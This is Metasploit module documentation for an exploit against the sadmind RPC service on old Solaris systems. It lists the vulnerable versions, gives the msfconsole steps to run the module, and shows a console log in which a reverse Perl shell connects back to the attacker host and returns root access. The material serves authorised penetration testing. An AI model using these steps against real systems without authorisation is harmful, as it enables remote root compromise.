CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/solaris/sunrpc/sadmind_exec.md
Views: 18602

Vulnerable Application

This exploit targets a weakness in the default security settings of the Sun Solstice AdminSuite distributed system administration daemon (sadmind) RPC application. This server is installed and enabled by default on most versions of the Solaris operating system.

Vulnerable systems include Solaris 2.7, 8, and 9.

This module has been successfully tested on:

  • Solaris 8 02/00 (x86);

  • Solaris 8u1 06/00 (x86);

  • Solaris 8u2 10/00 (x86);

  • Solaris 8u3 01/01 (x86);

  • Solaris 8u4 04/01 (x86);

  • Solaris 9u2 12/02 (x86).

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/solaris/sunrpc/sadmind_exec

  3. Do: set rhosts [rhost]

  4. Do: exploit

  5. You should get a new session as the root user.

Options

HOSTNAME

Remote hostname. The hostname will be detected automatically by default; however, using the automatically detected hostname will fail if the system hostname was changed after the sadmind service was started.

GID

GID to emulate (default: 0)

UID

UID to emulate (default: 0)

Scenarios

Solaris 8u1 06/00 s28x_u1wos_08 INTEL (x86)

msf6 > use exploit/solaris/sunrpc/sadmind_exec
msf6 exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.148
rhosts => 192.168.200.148
msf6 exploit(solaris/sunrpc/sadmind_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(solaris/sunrpc/sadmind_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.148:111 - Attempting to determine hostname
[*] 192.168.200.148:111 - Found hostname: unknown
[*] 192.168.200.148:111 - Sending payload (234 bytes)
[+] 192.168.200.148:111 - Exploit did not give us an error, this is good.
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.148:32810) at 2025-04-21 01:38:08 -0400

id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.8 Generic_108529-01 i86pc i386 i86pc
cat /etc/release
                        Solaris 8 6/00 s28x_u1wos_08 INTEL
           Copyright 2000 Sun Microsystems, Inc.  All Rights Reserved.
                             Assembled 28 April 2000